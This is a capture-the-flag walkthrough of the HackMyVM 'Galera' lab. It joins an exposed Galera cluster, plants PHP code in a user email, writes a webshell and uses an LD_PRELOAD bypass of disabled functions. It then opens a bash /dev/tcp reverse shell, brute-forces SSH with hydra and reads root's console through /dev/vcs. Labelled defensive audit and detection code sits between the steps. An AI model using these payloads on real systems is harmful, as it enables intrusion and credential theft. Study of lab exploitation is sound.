hackmyvm galera writeup

Port scanning

└─$ sudo nmap -sT -p- --min-rate 10000 192.168.125.11      
[sudo] password for bug: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 22:42 CST
Nmap scan report for 192.168.125.11
Host is up (0.12s latency).
Not shown: 54116 closed tcp ports (conn-refused), 11416 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
4567/tcp open  tram
MAC Address: 08:00:27:68:AD:0D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 40.33 seconds
└─$ sudo nmap -sTCV -p22,80,4567 -O 192.168.125.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-25 22:44 CST
Nmap scan report for 192.168.125.11
Host is up (0.0022s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 28:50:32:2f:bb:ef:7e:51:c3:59:cb:e6:40:88:0e:4e (ECDSA)
|_  256 f3:fa:a1:84:c6:da:fc:09:fe:aa:ca:ec:0a:29:7d:30 (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Login
4567/tcp open  tram?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:68:AD:0D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.90 seconds

Web

4567 is an odd port. I asked DeepSeek what the box name galera means; it said it is a MySQL plugin that supports distributed databases, so I guessed that we need to connect to the target's cluster node here. I asked DeepSeek how to configure a Galera node and set up my.cnf to try connecting:

[mysqld]
# basic settings
binlog_format=ROW
default-storage-engine=InnoDB
innodb_autoinc_lock_mode=2
bind-address=0.0.0.0  # allow remote access (restrict the IPs in production)

# Galera settings
wsrep_on=ON
wsrep_provider=/usr/lib/galera/libgalera_smm.so
wsrep_cluster_address="gcomm://192.168.125.11"
wsrep_node_address="192.168.125.5"
wsrep_node_name="nodeX"
wsrep_sst_method=rsync

Restart mariadb:

sudo systemctl restart mariadb

Go into mysql and a new database has appeared:

sudo mysql
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| galeradb           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.034 sec)

MariaDB [(none)]> show tables in galeradb;
+--------------------+
| Tables_in_galeradb |
+--------------------+
| users              |
+--------------------+
1 row in set (0.001 sec)

MariaDB [(none)]> use galeradb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [galeradb]> select * from usrs;
ERROR 1146 (42S02): Table 'galeradb.usrs' doesn't exist
MariaDB [galeradb]> select * from users;
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
| id | username | email                                                                         | password                                                     | created_at          |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
|  1 | admin    | admin@galera.hmv                                                              | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
|  2 | a        | <?php file_put_contents($_POST['f'],base64_decode($_POST['d']));?>@galera.hmv | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
2 rows in set (0.003 sec)

MariaDB [galeradb]> exit;
Bye
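
Two defensive checks for what this section exploits, written as an added example (not code from the writeup or from Galera): audit_galera_cnf() flags the my.cnf settings that let any host that can reach port 4567 join the cluster and replicate the whole database, next to a hardened counterpart using Galera's socket.ssl options (a node must hold a certificate from a private CA) and gmcast.listen_addr; scan_wsrep_log() raises alerts from MariaDB error-log lines when an unknown peer is declared or the cluster size grows. The allow-list, certificate paths and log lines are assumptions constructed to mimic Galera's WSREP messages.

```python
import re

# Assumption: the box itself is the only legitimate cluster member.
ALLOWED_PEERS = {"192.168.125.11"}

# Constructed to mimic Galera's WSREP messages in the MariaDB error log.
PEER_RE = re.compile(
    r"WSREP: declaring (?P<uuid>[0-9a-f-]+) at (?:tcp|ssl)://(?P<ip>[\d.]+):(?P<port>\d+)")
SIZE_RE = re.compile(r"WSREP: New COMPONENT: .*memb_num = (?P<n>\d+)")

# The node config from the writeup (weak): any host that reaches 4567 may join.
OPEN_CNF = """[mysqld]
bind-address=0.0.0.0
wsrep_on=ON
wsrep_provider=/usr/lib/galera/libgalera_smm.so
wsrep_cluster_address="gcomm://192.168.125.11"
"""

# Hardened counterpart (assumed paths): TLS with a private CA, so only nodes
# holding a certificate it issued can join, and the listener pinned to one IP.
HARDENED_CNF = """[mysqld]
bind-address=127.0.0.1
wsrep_on=ON
wsrep_provider=/usr/lib/galera/libgalera_smm.so
wsrep_cluster_address="gcomm://192.168.125.11"
wsrep_provider_options="socket.ssl=yes;socket.ssl_ca=/etc/mysql/ssl/ca.pem;socket.ssl_cert=/etc/mysql/ssl/node.pem;socket.ssl_key=/etc/mysql/ssl/node-key.pem;gmcast.listen_addr=tcp://192.168.125.11:4567"
"""

# Constructed log lines: a foreign node joins and the cluster grows to two members.
SAMPLE_LOG = [
    "2025-05-25 22:50:01 0 [Note] WSREP: declaring 7a1c2e3d-b4f5-11ef-9d0e-aa00bb11cc22 at tcp://192.168.125.5:4567 stable",
    "2025-05-25 22:50:01 0 [Note] WSREP: New COMPONENT: primary = yes, bootstrap = no, my_idx = 0, memb_num = 2",
]

def parse_mysqld_section(cnf_text):
    """Key/value pairs from the [mysqld] section; '-' and '_' in keys are equivalent."""
    settings, in_mysqld = {}, False
    for raw in cnf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("["):
            in_mysqld = line.lower() == "[mysqld]"
        elif in_mysqld and "=" in line:
            key, val = line.split("=", 1)
            settings[key.strip().replace("-", "_")] = val.strip().strip('"')
    return settings

def audit_galera_cnf(cnf_text):
    """Findings that mean an unauthenticated peer can join and pull the whole database."""
    s = parse_mysqld_section(cnf_text)
    findings = []
    if s.get("wsrep_on", "").upper() == "ON":
        opts = s.get("wsrep_provider_options", "").replace(" ", "")
        if "socket.ssl=yes" not in opts:
            findings.append("no socket.ssl=yes: replication on 4567 is plaintext and unauthenticated")
        if "gmcast.listen_addr=" not in opts:
            findings.append("no gmcast.listen_addr: group communication listens on every interface")
    if s.get("bind_address") in ("0.0.0.0", "::"):
        findings.append("bind-address=0.0.0.0 also exposes the SQL port")
    return findings

def scan_wsrep_log(lines, allowed=ALLOWED_PEERS, expected_size=1):
    """Alert on a peer outside the allow-list or a cluster larger than expected_size."""
    alerts = []
    for line in lines:
        m = PEER_RE.search(line)
        if m and m["ip"] not in allowed:
            alerts.append(f"unknown peer {m['ip']}:{m['port']} (uuid {m['uuid'][:8]})")
        m = SIZE_RE.search(line)
        if m and int(m["n"]) > expected_size:
            alerts.append(f"cluster size {m['n']} exceeds expected {expected_size}")
    return alerts
```

A host firewall that limits 4567, 4568 and 4444 to the known node addresses is the other half of the fix; the config audit cannot see that.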

(The admin password above had already been changed by me, and the user with id 2 was created by me after getting in.) Let's take a look at the web app:
[image]

A quick dirsearch enumeration of directories and common files:

[12:38:57] Starting:
[12:38:58] 403 -  279B  - /.ht_wsr.txt
[12:38:58] 403 -  279B  - /.htaccess.orig
[12:38:58] 403 -  279B  - /.htaccess.bak1
[12:38:58] 403 -  279B  - /.htaccess.save
[12:38:58] 403 -  279B  - /.htaccess.sample
[12:38:58] 403 -  279B  - /.htaccess_extra
[12:38:58] 403 -  279B  - /.htaccessBAK
[12:38:58] 403 -  279B  - /.htaccess_sc
[12:38:58] 403 -  279B  - /.htaccess_orig
[12:38:58] 403 -  279B  - /.htaccessOLD2
[12:38:58] 403 -  279B  - /.htaccessOLD
[12:38:58] 403 -  279B  - /.htm
[12:38:58] 403 -  279B  - /.htpasswd_test
[12:38:58] 403 -  279B  - /.html
[12:38:58] 403 -  279B  - /.htpasswds
[12:38:58] 403 -  279B  - /.httr-oauth
[12:38:58] 403 -  279B  - /.php
[12:39:03] 200 -    0B  - /config.php
[12:39:07] 200 -   22KB - /info.php
[12:39:07] 302 -    0B  - /login.php  ->  /
[12:39:08] 302 -    0B  - /logout.php  ->  index.php
[12:39:10] 403 -   21B  - /private.php
[12:39:12] 403 -  279B  - /server-status/
[12:39:12] 403 -  279B  - /server-status
[12:39:14] 301 -  317B  - /upload  ->  http://192.168.125.11/upload/
[12:39:14] 200 -    0B  - /upload/
[12:39:14] 200 -   13B  - /upload/test.txt

A bit of testing turned up no vulnerability. The login username and password should be the data in the users table, so we can just add a user to the table or change the admin user's password and log in. Use CyberChef to generate a bcrypt hash:
[image]
Create a test user in the table with password 123456:

MariaDB [galeradb]> insert into users values(3,'test','test@test.com','$2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16','2025-05-05 07:55:51');
Query OK, 1 row affected (0.037 sec)

Log into the backend:
[image]

Digging for vulnerabilities in the backend, I found that after inserting PHP code into a user's email address, posting a message and then clicking view, the code is parsed and executed:

MariaDB [galeradb]> insert into users values(4,'a',0x3c3f706870206563686f202774657374273b3f3e40612e636f6d,'$2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16','2025-05-05 07:55:51');
ERROR 1062 (23000): Duplicate entry 'a' for key 'username'
MariaDB [galeradb]> insert into users values(4,'b',0x3c3f706870206563686f202774657374273b3f3e40612e636f6d,'$2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16','2025-05-05 07:55:51');
Query OK, 1 row affected (0.006 sec)

MariaDB [galeradb]> select * from users;
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
| id | username | email                                                                         | password                                                     | created_at          |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
|  1 | admin    | admin@galera.hmv                                                              | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
|  2 | a        | <?php file_put_contents($_POST['f'],base64_decode($_POST['d']));?>@galera.hmv | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
|  3 | test     | test@test.com                                                                 | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
|  4 | b        | <?php echo 'test';?>@a.com                                                    | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
4 rows in set (0.003 sec)

MariaDB [galeradb]> delete from users where id=2;
Query OK, 1 row affected (0.004 sec)

MariaDB [galeradb]> select * from users;
+----+----------+----------------------------+--------------------------------------------------------------+---------------------+
| id | username | email                      | password                                                     | created_at          |
+----+----------+----------------------------+--------------------------------------------------------------+---------------------+
|  1 | admin    | admin@galera.hmv           | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
|  3 | test     | test@test.com              | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
|  4 | b        | <?php echo 'test';?>@a.com | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
+----+----------+----------------------------+--------------------------------------------------------------+---------------------+
3 rows in set (0.001 sec)

[image]

With the code injection point confirmed, we can try to get a webshell. Visiting the info.php enumerated earlier shows that many functions are disabled:

exec, shell_exec, system, passthru, proc_open, proc_close, proc_terminate, popen, pcntl_exec, pcntl_fork, pcntl_wait, pcntl_signal, dl, eval, assert, create_function, include, include_once, require_once, show_source, highlight_file, fopen, file, readfile, file_get_contents, fileperms, chmod, chown, chgrp, symlink, link, mail, curl_exec, curl_multi_exec, socket_create, socket_connect, socket_send, socket_recv, stream_socket_client

Getting a webshell here is more troublesome, but still doable. The basic idea is to use this project by a master: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

First we need a way to upload the required .so file and the PHP file that loads it. We start by creating a user in the database whose email is <?php file_put_contents($_POST['f'],base64_decode($_POST['d']));?>@galera.hmv:

MariaDB [galeradb]> insert into users values(2,'a',0x3c3f7068702066696c655f7075745f636f6e74656e747328245f504f53545b2766275d2c6261736536345f6465636f646528245f504f53545b2764275d29293b3f3e4067616c6572612e686d76,'$2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16','2025-05-05 07:55:51');
Query OK, 1 row affected (0.005 sec)

MariaDB [galeradb]> select * from users;
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
| id | username | email                                                                         | password                                                     | created_at          |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
|  1 | admin    | admin@galera.hmv                                                              | $2a$10$LN2Op7TwfxL.o2iGb1gOzObpKGbcWVifqdx4Q67FyH8FGwx5UH6dG | 2025-05-05 07:55:51 |
|  2 | a        | <?php file_put_contents($_POST['f'],base64_decode($_POST['d']));?>@galera.hmv | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
|  3 | test     | test@test.com                                                                 | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
|  4 | b        | <?php echo 'test';?>@a.com                                                    | $2a$10$thrmbhCiTHpkoPy.4WXco.zWqvf/.PXxCouWfy0dlR4YApteILE16 | 2025-05-05 07:55:51 |
+----+----------+-------------------------------------------------------------------------------+--------------------------------------------------------------+---------------------+
4 rows in set (0.001 sec)

Log in as this user, post a message, then click view and capture the request:

POST /private.php?view=1 HTTP/1.1
Host: 192.168.125.11
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=pfmerbu964avspkbqf818nhhrn
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

f=upload/bypass3.php&d=content_base

f is the relative path of the file to write and d is the base64-encoded content to write. Note that under the web root only the upload directory is writable. Using this method, write the two files bypass3.php and e.so into the upload directory. Contents of bypass3.php:

<?php
    echo "<p> <b>example</b>: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so </p>";

    $cmd = $_GET["cmd"];
    $out_path = $_GET["outpath"];
    $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
    echo "<p> <b>cmdline</b>: " . $evil_cmdline . "</p>";

    putenv("EVIL_CMDLINE=" . $evil_cmdline);

    $so_path = $_GET["sopath"];
    putenv("LD_PRELOAD=" . $so_path);

    // mail() is in the disable_functions list above, so error_log() with
    // message_type 1 (send by mail) is used instead of the project's mail() call
    //mail("", "", "", "");
    error_log('123', 1, 'test@qq.com', '');

    // file_get_contents() is disabled too, so the output is read from the file afterwards
    //echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";

    //unlink($out_path);
?>

e.so is the x64 .so file from the project https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

Listen locally:

nc -lnvp 1234

Visit:

http://192.168.1.18/upload/bypass3.php?cmd=bash%20%2Dc%20%27exec%20bash%20%2Di%20%26%3E%2Fdev%2Ftcp%2F192%2E168%2E1%2E17%2F1234%20%3C%261%27&outpath=/var/www/html/upload/result.txt&sopath=/var/www/html/upload/e.so

and we get a reverse shell:

└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.125.5] from (UNKNOWN) [192.168.125.11] 37618
bash: cannot set terminal process group (580): Inappropriate ioctl for device
bash: no job control in this shell
www-data@galera:/var/www/html/upload$ ls -al
ls -al
total 7056
drwxr-xr-x 2 www-data www-data    4096 May 23 20:02 .
drwxr-xr-x 3 root     root        4096 May  7 20:34 ..
-rw-r--r-- 1 www-data www-data     582 May 23 14:19 bypass.php
-rw-r--r-- 1 www-data www-data     626 May 23 14:25 bypass2.php
-rw-r--r-- 1 www-data www-data     626 May 23 14:27 bypass3.php
-rw-r--r-- 1 www-data www-data    2350 May 23 13:53 config.txt
-rw-r--r-- 1 www-data www-data    6952 May 23 14:36 e.so
-rw-r--r-- 1 root     root           0 May  7 20:35 index.html
-rw-r--r-- 1 www-data www-data   90858 May 23 15:01 less.sh
-rwxr-xr-x 1 www-data www-data  862779 May 23 15:01 linpeas.sh
-rw-r--r-- 1 www-data www-data      87 May 23 20:10 loop.php
-rw-r--r-- 1 www-data www-data    1149 May 23 13:56 passwd.txt
-rw-r--r-- 1 www-data www-data    2869 May 23 14:00 private.txt
-rwxr-xr-x 1 www-data www-data 3104768 May 23 15:06 pspy64
-rw-r--r-- 1 www-data www-data 1022976 May 23 15:05 pspy64_aa
-rw-r--r-- 1 www-data www-data 1022976 May 23 15:05 pspy64_ab
-rw-r--r-- 1 www-data www-data 1022976 May 23 15:05 pspy64_ac
-rw-r--r-- 1 www-data www-data   35840 May 23 15:06 pspy64_ad
-rw-r--r-- 1 www-data www-data       0 May 25 11:31 result.txt
-rw-r--r-- 1 www-data www-data      13 May 23 14:07 test.txt
-rw-r--r-- 1 www-data www-data    1960 May 23 15:00 upload2.php
www-data@galera:/var/www/html/upload$ 

(The assorted files in there are ones I uploaded later for privilege escalation.)

user

First, gather some passwords:

www-data@galera:/var/www/html$ cat create_admin.php
cat create_admin.php
<?php
require 'config.php';

$username = 'admin';
$email = 'admin@example.com';
$pass_plain = 'SgvKp417lLE1XH8NLfJ3';
$hash = password_hash($pass_plain, PASSWORD_BCRYPT);

$stmt = $pdo->prepare('INSERT INTO users (username, email, password) VALUES (?, ?, ?)');
try {
    $stmt->execute([
        $username,
        $email,
        $hash
    ]);
    echo "Usuario 'admin' creado correctamente.";
} catch (PDOException $e) {
    if ($e->getCode() === '23000') {
        echo "El usuario 'admin' ya existe.";
    } else {
        error_log($e->getMessage());
        echo "Error al crear el usuario.";
    }
}
www-data@galera:/var/www/html$ cat config.php
cat config.php
<?php
......
// Database connection parameters
$host    = 'localhost';
$db      = 'galeradb';
$user    = 'galeradbusr';
$pass    = '8d7F4TnHRYQaGDjvwUpt';
$charset = 'utf8mb4';

// Data Source Name (DSN)
$dsn = "mysql:host={$host};dbname={$db};charset={$charset}";
$options = [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    PDO::ATTR_EMULATE_PREPARES   => false,
];
......

Contents of /etc/passwd:

www-data@galera:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
donjuandeaustria:x:1000:1000:donjuandeaustria,,,:/home/donjuandeaustria:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false

We should get donjuandeaustria first. I tried the two passwords found above and neither worked; I was stuck here for a while. Finally I tried brute-forcing the SSH password with rockyou weak passwords, which succeeded:

└─$ hydra -l donjuandeaustria -P ~/Desktop/dict/rockyou_top_10000.txt ssh://192.168.125.11 -f    
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-26 12:59:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:1/p:10000), ~625 tries per task
[DATA] attacking ssh://192.168.125.11:22/
[STATUS] 189.00 tries/min, 189 tries in 00:01h, 9815 to do in 00:52h, 12 active
[22][ssh] host: 192.168.125.11   login: donjuandeaustria   password: amorcito
[STATUS] attack finished for 192.168.125.11 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-26 13:02:00
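
An added detection example (not from the writeup): a sliding-window detector over sshd auth.log lines of the kind the hydra run above leaves on the target, which flags a source after repeated failures and escalates when that same source then logs in successfully. The log lines are constructed; the timestamp parsing assumes Debian's default syslog layout without a year.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# One line per attempt, as sshd logs it on Debian (constructed sample below).
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2")

def _ts(s, year=2025):
    # syslog timestamps carry no year; assume the current one
    return datetime.strptime(f"{year} {s}", "%Y %b %d %H:%M:%S")

def detect_ssh_bruteforce(lines, threshold=10, window_s=60):
    """Flag a source once it reaches `threshold` failures within `window_s`
    seconds; a later successful login from a flagged source is reported as a
    likely compromised account (the hydra run above did ~189 tries/min)."""
    window = defaultdict(deque)   # ip -> recent failure timestamps
    flagged, alerts = set(), []
    for line in lines:
        m = SSHD_RE.match(line)
        if not m:
            continue
        ip, ts = m["ip"], _ts(m["ts"])
        if m["result"] == "Failed":
            q = window[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_s:
                q.popleft()          # drop failures outside the window
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(f"brute force from {ip}: {len(q)} failures in {window_s}s")
        elif ip in flagged:
            alerts.append(f"ACCOUNT COMPROMISE: {m['user']} logged in from {ip} after brute force")
    return alerts

def sample_auth_log():
    """Constructed: 12 failures in ~25 s, an unrelated failure, then a success."""
    lines = [
        f"May 26 12:59:{31 + i * 2:02d} galera sshd[{1200 + i}]: Failed password for "
        f"donjuandeaustria from 192.168.125.5 port {40100 + i} ssh2"
        for i in range(12)
    ]
    lines.append("May 26 13:00:01 galera sshd[1300]: Failed password for root from 10.0.0.9 port 50001 ssh2")
    lines.append("May 26 13:02:00 galera sshd[1301]: Accepted password for donjuandeaustria "
                 "from 192.168.125.5 port 40200 ssh2")
    return lines
```

Locking the account or the source after the first alert (fail2ban does exactly this window logic) is what turns the 52-minute run above into a dead end.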

Log in via SSH:

└─$ ssh donjuandeaustria@192.168.125.11
The authenticity of host '192.168.125.11 (192.168.125.11)' can't be established.
ED25519 key fingerprint is SHA256:i74LSOCZyaYgs80MUKyEspadufXaKwm+caBx6pcttAo.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:28: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.125.11' (ED25519) to the list of known hosts.
donjuandeaustria@192.168.125.11's password: 
Linux galera 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri May 23 19:26:18 2025 from 192.168.1.17
donjuandeaustria@galera:~$ cat user.txt
072f****************************

Got user.txt.

root

I didn't work out the privilege escalation myself; ll104567 taught me: [hackmyvm hard Galera box review] https://www.bilibili.com/video/BV1DDjKz8EpN/
The basic idea is that this user belongs to the tty group:

donjuandeaustria@galera:~$ id
uid=1000(donjuandeaustria) gid=1000(donjuandeaustria) groups=1000(donjuandeaustria),5(tty),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

Users in the tty group can observe the tty console output of other users (what they see on screen). Use the w command to check who is logged in:

donjuandeaustria@galera:~$ w
 11:44:51 up  1:17,  2 users,  load average: 0.02, 0.08, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty20    -                10:27    1:17m  0.08s  0.06s -bash
donjuand pts/0    192.168.125.5    11:41    1.00s  0.03s  0.02s w

root is on tty20, so cat /dev/vcs20 or cat /dev/vcsa20 lets us see what is on root's virtual terminal:
[image]
root's password is revealed there; log in via ssh or su root and get root.txt:
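
An added audit example (not from the writeup) for the exposure used here: /dev/vcsN is owned by root:tty, so any tty-group member can read the screen of whoever is logged in on virtual console N. The functions below list interactive tty-group members, find console logins in `w` output and report which consoles those members can read; the /etc/group, /etc/passwd and w text are constructed to mirror this box.

```python
import re

NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}
CONSOLE_RE = re.compile(r"^tty(\d+)$")

# Constructed to mirror the box above; only the file and command formats are real.
GROUP = "root:x:0:\ntty:x:5:donjuandeaustria\nwww-data:x:33:\n"
PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "donjuandeaustria:x:1000:1000:donjuandeaustria,,,:/home/donjuandeaustria:/bin/bash\n"
    "mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false\n"
)
W_OUTPUT = (
    " 11:44:51 up  1:17,  2 users,  load average: 0.02, 0.08, 0.06\n"
    "USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\n"
    "root     tty20    -                10:27    1:17m  0.08s  0.06s -bash\n"
    "donjuand pts/0    192.168.125.5    11:41    1.00s  0.03s  0.02s w\n"   # w truncates names to 8 chars
)

def parse_passwd(passwd_text):
    """user -> (primary gid, login shell)"""
    users = {}
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 7:
            users[f[0]] = (int(f[3]), f[6])
    return users

def tty_group_members(group_text, passwd_text):
    """Interactive users in group tty, via supplementary membership or primary gid."""
    passwd = parse_passwd(passwd_text)
    members, tty_gid = set(), None
    for line in group_text.splitlines():
        f = line.split(":")
        if len(f) >= 4 and f[0] == "tty":
            tty_gid = int(f[2])
            members |= {u for u in f[3].split(",") if u}
    members |= {u for u, (gid, _) in passwd.items() if gid == tty_gid}
    return sorted(u for u in members
                  if u in passwd and passwd[u][1] not in NON_LOGIN_SHELLS)

def console_sessions(w_text):
    """tty -> user for virtual-console logins in `w` output.
    pts/* sessions are skipped: only ttyN has a /dev/vcsN screen buffer."""
    sessions = {}
    for line in w_text.splitlines()[2:]:   # skip the uptime line and the header
        f = line.split()
        if len(f) >= 2 and CONSOLE_RE.match(f[1]):
            sessions[f[1]] = f[0]
    return sessions

def exposed_consoles(group_text, passwd_text, w_text):
    """(/dev/vcsN, console owner, other users who can read it).
    Fix: `gpasswd -d <user> tty`, and never leave a privileged shell logged in on a console."""
    readers = tty_group_members(group_text, passwd_text)
    exposed = []
    for tty, owner in sorted(console_sessions(w_text).items()):
        others = [r for r in readers if r != owner]
        if others:
            exposed.append((f"/dev/vcs{CONSOLE_RE.match(tty).group(1)}", owner, others))
    return exposed
```

On a live host feed the functions the real /etc/group and /etc/passwd contents and the output of `w`.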

donjuandeaustria@galera:~$ su root
Password: 
root@galera:/home/donjuandeaustria# cat /root.txt
cat: /root.txt: No such file or directory
root@galera:/home/donjuandeaustria# cd /
root@galera:/# cat root.txt
cat: root.txt: No such file or directory
root@galera:/# ls
